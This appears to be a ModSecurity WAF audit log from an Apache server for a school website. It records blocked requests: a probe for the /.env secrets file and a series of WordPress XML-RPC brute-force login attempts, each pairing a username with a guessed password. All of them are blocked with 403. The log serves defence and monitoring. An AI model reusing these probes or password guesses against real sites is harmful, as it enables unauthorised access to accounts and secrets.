proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076890508809 5422 (- - -) Stopwatch2: 1745076890508809 5422; combined=3881, p1=541, p2=3177, p3=0, p4=0, p5=96, sr=94, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --feef5655-Z-- --c15d7161-A-- [19/Apr/2025:22:35:20 +0700] aAPCuA6cTFSgLAHl7PpDHAAAABM 103.236.140.4 54368 103.236.140.4 8181 --c15d7161-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.59.160.222 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 Accept: */* --c15d7161-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c15d7161-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745076920902724 652 (- - -) Stopwatch2: 1745076920902724 652; combined=279, p1=238, p2=0, p3=0, p4=0, p5=41, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c15d7161-Z-- --1a73447c-A-- [19/Apr/2025:22:35:50 +0700] aAPC1kruoUXZj665VUFnRAAAANQ 103.236.140.4 55958 103.236.140.4 8181 --1a73447c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1a73447c-C-- wp.getUsersBlogs kasubagtu cooper --1a73447c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a73447c-E-- --1a73447c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076950345109 3942 (- - -) Stopwatch2: 1745076950345109 3942; combined=3071, p1=396, p2=2508, p3=0, p4=0, p5=96, sr=64, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a73447c-Z-- --e34ade40-A-- [19/Apr/2025:22:36:55 +0700] aAPDF3Na4dA2HllpK_PfcQAAAJY 103.236.140.4 59388 103.236.140.4 8181 --e34ade40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e34ade40-C-- wp.getUsersBlogs kasubagtu a801016 --e34ade40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e34ade40-E-- --e34ade40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077015678458 5419 (- - -) Stopwatch2: 1745077015678458 5419; combined=4066, p1=487, p2=3393, p3=0, p4=0, p5=111, sr=84, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e34ade40-Z-- --476bc922-A-- [19/Apr/2025:22:37:57 +0700] aAPDVQ6cTFSgLAHl7PpE2QAAABQ 103.236.140.4 34434 103.236.140.4 8181 --476bc922-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --476bc922-C-- wp.getUsersBlogs administrator administrator1 --476bc922-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --476bc922-E-- --476bc922-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077077156517 4983 (- - -) Stopwatch2: 1745077077156517 4983; combined=3766, p1=476, p2=3120, p3=0, p4=0, p5=100, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --476bc922-Z-- --fa097611-A-- [19/Apr/2025:22:38:57 +0700] aAPDkevDiFC_ir7MDwZLZQAAAEg 103.236.140.4 37686 103.236.140.4 8181 --fa097611-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fa097611-C-- wp.getUsersBlogs administrator inesslatOK_ --fa097611-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa097611-E-- --fa097611-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077137077695 5142 (- - -) Stopwatch2: 1745077137077695 5142; combined=3599, p1=458, p2=2968, p3=0, p4=0, p5=102, sr=89, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa097611-Z-- --2ee9a837-A-- [19/Apr/2025:22:39:57 +0700] aAPDzQ6cTFSgLAHl7PpGegAAAAE 103.236.140.4 40870 103.236.140.4 8181 --2ee9a837-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 240 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2ee9a837-C-- wp.getUsersBlogs administrator administratorpassword --2ee9a837-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ee9a837-E-- --2ee9a837-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077197995267 4140 (- - -) Stopwatch2: 1745077197995267 4140; combined=3280, p1=369, p2=2725, p3=0, p4=0, p5=108, sr=72, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ee9a837-Z-- --6f281d66-A-- [19/Apr/2025:22:40:59 +0700] aAPEC0ruoUXZj665VUFrtAAAAM4 103.236.140.4 44238 103.236.140.4 8181 --6f281d66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 231 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6f281d66-C-- wp.getUsersBlogs administrator 1q2w3e4r5t6y --6f281d66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f281d66-E-- --6f281d66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077259579101 4671 (- - -) Stopwatch2: 1745077259579101 4671; combined=3434, p1=425, p2=2813, p3=0, p4=0, p5=112, sr=74, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f281d66-Z-- --d2cfc44b-A-- [19/Apr/2025:22:42:01 +0700] aAPESXNa4dA2HllpK_PjeQAAAJY 103.236.140.4 47566 103.236.140.4 8181 --d2cfc44b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 239 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d2cfc44b-C-- wp.getUsersBlogs administrator smkn22-jkt.sch123456 --d2cfc44b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2cfc44b-E-- --d2cfc44b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077321893282 5421 (- - -) Stopwatch2: 1745077321893282 5421; combined=3654, p1=509, p2=2988, p3=0, p4=0, p5=97, sr=89, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2cfc44b-Z-- --c33ef873-A-- [19/Apr/2025:22:43:10 +0700] aAPEjuvDiFC_ir7MDwZOvwAAAE4 103.236.140.4 51126 103.236.140.4 8181 --c33ef873-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 236 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c33ef873-C-- wp.getUsersBlogs administrator administrator1983 --c33ef873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c33ef873-E-- --c33ef873-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077390559477 5115 (- - -) Stopwatch2: 1745077390559477 5115; combined=3672, p1=421, p2=2995, p3=0, p4=0, p5=142, sr=84, sw=114, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c33ef873-Z-- --7ca46d39-A-- [19/Apr/2025:22:44:10 +0700] aAPEyuvDiFC_ir7MDwZPDgAAAEM 103.236.140.4 53054 103.236.140.4 8181 --7ca46d39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7ca46d39-C-- wp.getUsersBlogs administrator #changeme! --7ca46d39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ca46d39-E-- --7ca46d39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077450366696 5695 (- - -) Stopwatch2: 1745077450366696 5695; combined=3897, p1=514, p2=3199, p3=0, p4=0, p5=109, sr=85, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ca46d39-Z-- --888fa613-A-- [19/Apr/2025:22:45:12 +0700] aAPFCA6cTFSgLAHl7PpKTQAAAAI 103.236.140.4 53342 103.236.140.4 8181 --888fa613-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --888fa613-C-- wp.getUsersBlogs administrator 1g2w3e4r --888fa613-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --888fa613-E-- --888fa613-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077512492909 5445 (- - -) Stopwatch2: 1745077512492909 5445; combined=3922, p1=477, p2=3251, p3=0, p4=0, p5=114, sr=86, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --888fa613-Z-- --07c6b976-A-- [19/Apr/2025:22:46:13 +0700] aAPFRQ6cTFSgLAHl7PpKgQAAAA0 103.236.140.4 53648 103.236.140.4 8181 --07c6b976-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --07c6b976-C-- wp.getUsersBlogs administrator yankees --07c6b976-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07c6b976-E-- --07c6b976-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077573042780 5462 (- - -) Stopwatch2: 1745077573042780 5462; combined=3906, p1=482, p2=3219, p3=0, p4=0, p5=117, sr=87, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07c6b976-Z-- --ab094679-A-- [19/Apr/2025:22:47:14 +0700] aAPFgg6cTFSgLAHl7PpKrAAAABc 103.236.140.4 53948 103.236.140.4 8181 --ab094679-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ab094679-C-- wp.getUsersBlogs administrator london --ab094679-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab094679-E-- --ab094679-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077634023040 5623 (- - -) Stopwatch2: 1745077634023040 5623; combined=4060, p1=514, p2=3191, p3=0, p4=0, p5=193, sr=102, sw=162, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab094679-Z-- --074c3247-A-- [19/Apr/2025:22:48:22 +0700] aAPFxkruoUXZj665VUFuLwAAAMw 103.236.140.4 54288 103.236.140.4 8181 --074c3247-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 237 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --074c3247-C-- wp.getUsersBlogs administrator administrator@1981 --074c3247-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --074c3247-E-- --074c3247-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077702180254 5264 (- - -) Stopwatch2: 1745077702180254 5264; combined=3801, p1=442, p2=3183, p3=0, p4=0, p5=103, sr=87, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --074c3247-Z-- --f4906e23-A-- [19/Apr/2025:22:49:24 +0700] aAPGBEruoUXZj665VUFuYwAAANQ 103.236.140.4 54576 103.236.140.4 8181 --f4906e23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f4906e23-C-- wp.getUsersBlogs administrator marketing2019 --f4906e23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4906e23-E-- --f4906e23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077764576334 5407 (- - -) Stopwatch2: 1745077764576334 5407; combined=3860, p1=445, p2=3235, p3=0, p4=0, p5=108, sr=86, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4906e23-Z-- --26fdec21-A-- [19/Apr/2025:22:50:26 +0700] aAPGQnNa4dA2HllpK_PkxgAAAIc 103.236.140.4 54914 103.236.140.4 8181 --26fdec21-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --26fdec21-C-- wp.getUsersBlogs administrator newcastle --26fdec21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26fdec21-E-- --26fdec21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: 